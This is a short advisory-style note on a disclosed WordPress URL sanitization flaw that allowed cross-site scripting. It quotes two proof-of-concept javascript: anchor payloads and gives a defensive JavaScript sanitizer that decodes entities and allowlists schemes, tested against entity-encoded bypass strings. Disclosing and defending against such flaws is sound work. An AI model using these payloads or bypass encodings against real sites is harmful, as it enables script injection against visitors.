According to the WordPress release notes: “Props to Soroush Dalili (@irsdl) from NCC Group for disclosing an issue with URL sanitization that can lead to cross-site scripting (XSS) attacks.”
Thanks to @irsdl's HackerOne disclosure:
<a href="javascript:alert(document.domain)">JS - Numerical Entities</a>
<a href="javascript:x=1;alert(document.domain)">JS - Hex Entities</a>
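A URL sanitizer has to judge the scheme a browser sees after HTML character references are decoded, not the raw attribute text. The sketch below is an added example, not WordPress code and not taken from the disclosure; the function names, the allowlist and the entity-encoded sample inputs are constructed assumptions, since the hrefs above appear in decoded form.

```javascript
// Added example, not WordPress code. Names and sample inputs are constructed.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);
// Partial table; a production sanitizer should use a full HTML entity decoder.
const NAMED = new Map([["colon", ":"], ["Tab", "\t"], ["NewLine", "\n"], ["amp", "&"]]);

// Map a code point to a character, replacing invalid values with U+FFFD.
function fromCodePoint(cp) {
  const invalid = !(cp > 0 && cp <= 0x10ffff) || (cp >= 0xd800 && cp <= 0xdfff);
  return invalid ? "\ufffd" : String.fromCodePoint(cp);
}

// Decode character references in one pass, as an HTML attribute parser does.
// Numeric references are decoded even when the trailing ";" is missing.
function decodeEntities(input) {
  const ref = /&(?:#[xX]([0-9a-fA-F]+);?|#([0-9]+);?|([A-Za-z]+);)/g;
  return input.replace(ref, (whole, hex, dec, name) => {
    if (hex !== undefined) return fromCodePoint(parseInt(hex, 16));
    if (dec !== undefined) return fromCodePoint(parseInt(dec, 10));
    return NAMED.get(name) ?? whole;
  });
}

// Scheme as a URL parser would see it, or null for a relative URL.
function effectiveScheme(rawHref) {
  const url = decodeEntities(rawHref)
    .replace(/[\t\n\r]/g, "")           // URL parsers drop these anywhere
    .replace(/^[\u0000-\u0020]+/, "");  // and leading C0 controls / spaces
  const m = /^([A-Za-z][A-Za-z0-9+.\-]*):/.exec(url);
  return m ? m[1].toLowerCase() : null;
}

function isSafeHref(rawHref) {
  const scheme = effectiveScheme(rawHref);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// For contrast: a check that inspects only the raw attribute text.
function naiveIsSafeHref(rawHref) {
  return !/^\s*javascript:/i.test(rawHref);
}

// Constructed inputs: the colon is written as a numeric reference without ";".
const SAMPLES = [
  "javascript&#58alert(document.domain)",
  "javascript&#x3ax=1;alert(document.domain)",
  "https://example.com/?a=1&b=2",
];
for (const href of SAMPLES) {
  console.log(JSON.stringify(href), "naive:", naiveIsSafeHref(href), "decoded:", isSafeHref(href));
}
```

The raw-text check accepts both encoded samples, while the decode-then-allowlist check rejects them and still accepts the ordinary `https` link.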